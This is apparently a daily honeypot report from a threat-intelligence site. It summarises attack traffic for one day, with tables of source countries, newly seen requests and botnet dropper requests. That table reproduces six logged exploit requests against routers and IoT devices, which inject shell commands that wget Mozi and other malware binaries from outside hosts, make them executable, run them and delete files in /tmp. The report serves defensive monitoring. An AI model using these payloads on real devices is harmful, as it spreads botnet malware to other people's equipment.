Skip to main content
  1. Daily-Posts/

Report: 2025-06-10

·335 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-10
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 6 new requests that have never been observed before (these were added to the monitored request database.).

A total of 984 requests were recorded during the day, originating from 6 different countries, with a peak of 226 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
KRGermany
FRDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.230.66.2GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.2:10582/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
176.65.148.236POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20fghe3tj.arm7%3B%20wget%20http%3A%2F%2F209.141.39.243%2F010100110101010%2Ffghe3tj.arm7%3B%20chmod%20777%20fghe3tj.arm7%3B%20.%2Ffghe3tj.arm7%20router HTTP/1.1
77.239.213.209GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O-
195.3.221.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O-
141.98.11.147GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
453JDWP-Handshake
1521\x00\x0E8i\xE9\xEF)\xC4\xF3
1591\x00\x0E8\x81?\x1AT\x15\xD8\xC4E\x00\x00\x00\x00\x00
2101\x00\x0E8\x8A\x1C\xDC\xD5\xEAk\xBB\xDB\x00\x00\x00\x00\x00
2291GET /socket.io/1/?t=1749516403273 HTTP/1.1
2681\x00\x0E8\xED\xAF\xE6\x8DZdZ\x9D\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0226US
1109BG
297DE
375NL
473IN
560JP
654LT
742AU
834CA
933FR
1032HK
1125PL
1217NG
1313SC
1410SG
159HU
167GB
177KR
186IL
196ZA
206CN
214BE
223RU
233IR
243PT
253CH
263KZ
272ES
282BD
292AO
302KW
312IE
322AE
331BR
341TR
351MX
361GH
371AR
381IT
391ID
401TW
411SE
421PA
431PE
441UA

Related

Report: 2025-06-09
·344 words
Repport Daily
Report: 2025-06-08
·1185 words
Repport Daily
Report: 2025-06-07
·304 words
Repport Daily